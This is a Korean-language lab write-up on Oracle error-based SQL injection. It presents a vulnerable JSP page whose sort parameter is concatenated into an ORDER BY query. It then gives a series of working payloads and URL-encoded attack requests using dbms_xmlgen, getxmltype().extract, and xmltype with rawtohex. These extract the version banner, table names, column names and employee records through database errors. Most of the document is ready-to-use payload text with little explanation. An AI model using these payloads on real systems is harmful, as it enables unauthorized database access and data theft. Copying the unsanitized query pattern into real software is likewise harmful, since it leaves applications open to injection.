Oracle Error SQLi 실습(XML 내장함수, to_char(), to_number(), rawtohex())

Oracle 데이터베이스는 where 절을 할 시에는 무조건 '='와 대응되는 무언가가 있어야한다.

소스코드 1

<%@ page contentType="text/html; charset=euc-kr" %>
<%@ include file="dbcon.jsp" %>
<%@ page import="java.util.*,java.text.*"%>
 
<html>
<head>
<title>opensecurelab</title>
</head>
<body>
<table border=1 cellpadding=5 cellspacing=0>
        <tr>
        <td>Employee ID</td>
        <td>FirstName</td>
        <td>JOB_ID</td>
        <td>HireDate</td>
        </tr>
<%
String _sort=request.getParameter("sort");
if (_sort==""){
        _sort="employeee_id";
}
 
sql = "select * from employees order by "+_sort;
stmt = con.createStatement();
rs = stmt.executeQuery(sql);
 
while(rs.next()) {
        String empid = rs.getString("employee_id");
        String name = rs.getString("first_name");
        String jobid = rs.getString("job_id");
        String hiredate = rs.getString("hire_date");
%>
 
        <tr>
        <td><%=empid%></td>
        <td><%=name%></td>
        <td><%=jobid%></td>
        <td><%=hiredate%></td>
        </tr>
<%
}
 
if(rs != null) rs.close();
if(stmt != null) stmt.close();
if(con != null)con.close();
%>
</table>
</body>
</html>

 

dbms_xmlgen.getxml

|| 는 HTTP 인코딩 방식으로 %7c%7c로 변경해준다.

[테이블 정보]

(to_char(dbms_xmlgen.getxml('select "' || substr((select table_name from (select rownum as rowidx, table_name from tabs)t where t.rowidx=1),1,30) || '" from dual'))) or (select to_char(dbms_xmlgen.getxml('select "' || substr((select table_name from (select rownum as rowidx, table_name from tabs)t where t.rowidx=1),1,30)|| '" from dual')) from dual)

- http://192.168.1.46:8080/empinfo_sort.jsp?sort=(to_char(dbms_xmlgen.getxml(%27select%20%22%27%20%7c%7c%20substr((select%20table_name%20from%20(select%20rownum%20as%20rowidx,%20table_name%20from%20tabs)t%20where%20t.rowidx=1),1,30)%7c%7c%20%27%22%20from%20dual%27)))

 

[칼럼 정보]

(to_char(dbms_xmlgen.getxml('select "' || substr((select column_name from (select rownum as rowidx, column_name from cols where table_name='EMPLOYEES')t where t.rowidx=1),1,30)|| '" from dual'))) or (select to_char(dbms_xmlgen.getxml('select "' || substr((select column_name from (select rownum as rowidx, column_name from cols where table_name='EMPLOYEES')t where t.rowidx=1),1,30))||'" from dual')) from dual)

- http://192.168.1.46:8080/empinfo_sort.jsp?sort=(to_char(dbms_xmlgen.getxml(%27select%20%22%27%20%7c%7c%20substr((select%20column_name%20from%20(select%20rownum%20as%20rowidx,%20column_name%20from%20cols%20where%20table_name=%27EMPLOYEES%27)t%20where%20t.rowidx=1),1,30)%7c%7c%20%27%22%20from%20dual%27)))

 

[데이터 정보]

(to_char(dbms_xmlgen.getxml('select "' || substr((select employee_id||','||first_name from (select rownum as rowidx, employee_id, first_name from EMPLOYEES)t where t.rowidx=1),1,30)|| '" from dual'))) or (select to_char(dbms_xmlgen.getxml('select "' || substr((select employee_id||','||first_name from (select rownum as rowidx, employee_id, first_name from EMPLOYEES)t where t.rowidx=1),1,30)|| '" from dual'))from dual)

- http://192.168.1.46:8080/empinfo_sort.jsp?sort=(to_char(dbms_xmlgen.getxml(%27select%20%22%27%20%7c%7c%20substr((select%20employee_id%7c%7c%27,%27%7c%7cfirst_name%20from%20(select%20rownum%20as%20rowidx,%20employee_id,%20first_name%20from%20EMPLOYEES)t%20where%20t.rowidx=1),1,30)%7c%7c%20%27%22%20from%20dual%27)))

 

dbms_xmlgen.getxmltype().extract()

to_number로 해야 결과가 추출됨

 

[테이블 정보]

(TO_NUMBER(dbms_xmlgen.getxmltype('select tname from tab').extract('.' || (select table_name from(select rownum as rowidx, table_name from tabs)t where t.rowidx=1)))) or (select TO_NUMBER(dbms_xmlgen.getxmltype('select tname from tab').extract('.' || (select table_name from(select rownum as rowidx, table_name from tabs)t where t.rowidx=1)))from dual)

- http://192.168.1.46:8080/empinfo_sort.jsp?sort=(TO_NUMBER(dbms_xmlgen.getxmltype(%27select%20tname%20from%20tab%27).extract(%27.%27%20%7c%7c%20(select%20table_name%20from(select%20rownum%20as%20rowidx,%20table_name%20from%20tabs)t%20where%20t.rowidx=1))))

 

[칼럼 정보]

(TO_NUMBER(dbms_xmlgen.getxmltype('select tname from tab').extract('.' || (select column_name from(select rownum as rowidx, column_name from cols where table_name='EMPLOYEES')t where t.rowidx=1)))) or (select TO_NUMBER(dbms_xmlgen.getxmltype('select tname from tab').extract('.' || (select column_name from(select rownum as rowidx, column_name from cols where table_name='EMPLOYEES')t where t.rowidx=1)))from dual)

- http://192.168.1.46:8080/empinfo_sort.jsp?sort=(TO_NUMBER(dbms_xmlgen.getxmltype(%27select%20tname%20from%20tab%27).extract(%27.%27%20%7c%7c%20(select%20column_name%20from(select%20rownum%20as%20rowidx,%20column_name%20from%20cols%20where%20table_name=%27EMPLOYEES%27)t%20where%20t.rowidx=1))))

 

[데이터 정보]

(TO_NUMBER(dbms_xmlgen.getxmltype('select tname from tab').extract('.' || (select employee_id||','||first_name from(select rownum as rowidx, employee_id, first_name from EMPLOYEES)t where t.rowidx=1)))) or (select TO_NUMBER(dbms_xmlgen.getxmltype('select tname from tab').extract('.' || (select employee_id||','||first_name from(select rownum as rowidx, employee_id, first_name from EMPLOYEES)t where t.rowidx=1)))from dual)

- http://192.168.1.46:8080/empinfo_sort.jsp?sort=(TO_NUMBER(dbms_xmlgen.getxmltype(%27select%20tname%20from%20tab%27).extract(%27.%27%20%7c%7c%20(select%20employee_id%7c%7c%27,%27%7c%7cfirst_name%20from(select%20rownum%20as%20rowidx,%20employee_id,%20first_name%20from%20EMPLOYEES)t%20where%20t.rowidx=1))))

 

XMLType

 

[버전 정보]

(rawtohex(xmltype((select '<start_'|| rawtohex(banner)||'_end:root>' from v$version where rownum=1)))) or (select rawtohex(xmltype((select '<start_'|| rawtohex(banner)||'_end:root>' from v$version where rownum=1))) from dual)

- http://192.168.1.46:8080/empinfo_sort.jsp?sort=(rawtohex(xmltype((select%20%27%3Cstart_%27%7c%7c%20rawtohex(banner)%7c%7c%27_end:root%3E%27%20from%20v$version%20where%20rownum=1))))

 

[테이블 정보]

(rawtohex(xmltype((select '<start_'|| rawtohex(table_name)||'_end:root>' from (select rownum as rowidx, table_name from tabs)t where t.rowidx=1)))) or (select rawtohex(xmltype((select '<start_'|| rawtohex(table_name)||'_end:root>' from (select rownum as rowidx, table_name from tabs)t where t.rowidx=1)))from dual)

- http://192.168.1.46:8080/empinfo_sort.jsp?sort=(rawtohex(xmltype((select%20%27%3Cstart_%27%7c%7c%20rawtohex(table_name)%7c%7c%27_end:root%3E%27%20from%20(select%20rownum%20as%20rowidx,%20table_name%20from%20tabs)t%20where%20t.rowidx=1))))

 

[칼럼 정보]

(rawtohex(xmltype((select '<start_'|| rawtohex(column_name)||'_end:root>' from (select rownum as rowidx, column_name from cols where table_name='EMPLOYEES')t where t.rowidx=1)))) or (select rawtohex(xmltype((select '<start_'|| rawtohex(column_name)||'_end:root>' from (select rownum as rowidx, column_name from cols where table_name='EMPLOYEES')t where t.rowidx=1)))from dual)

- http://192.168.1.46:8080/empinfo_sort.jsp?sort=(rawtohex(xmltype((select%20%27%3Cstart_%27%7c%7c%20rawtohex(column_name)%7c%7c%27_end:root%3E%27%20from%20(select%20rownum%20as%20rowidx,%20column_name%20from%20cols%20where%20table_name=%27EMPLOYEES%27)t%20where%20t.rowidx=1))))

 

[데이터 정보]

(rawtohex(xmltype((select '<start_'|| rawtohex(employee_id||','||first_name)||'_end:root>' from (select rownum as rowidx, employee_id, first_name from EMPLOYEES)t where t.rowidx=1)))) or (select rawtohex(xmltype((select '<start_'|| rawtohex(employee_id||','||first_name)||'_end:root>' from (select rownum as rowidx, employee_id, first_name from EMPLOYEES)t where t.rowidx=1)))from dual)

- http://192.168.1.46:8080/empinfo_sort.jsp?sort=(rawtohex(xmltype((select%20%27%3Cstart_%27%7c%7c%20rawtohex(employee_id%7c%7c%27,%27%7c%7cfirst_name)%7c%7c%27_end:root%3E%27%20from%20(select%20rownum%20as%20rowidx,%20employee_id,%20first_name%20from%20EMPLOYEES)t%20where%20t.rowidx=1))))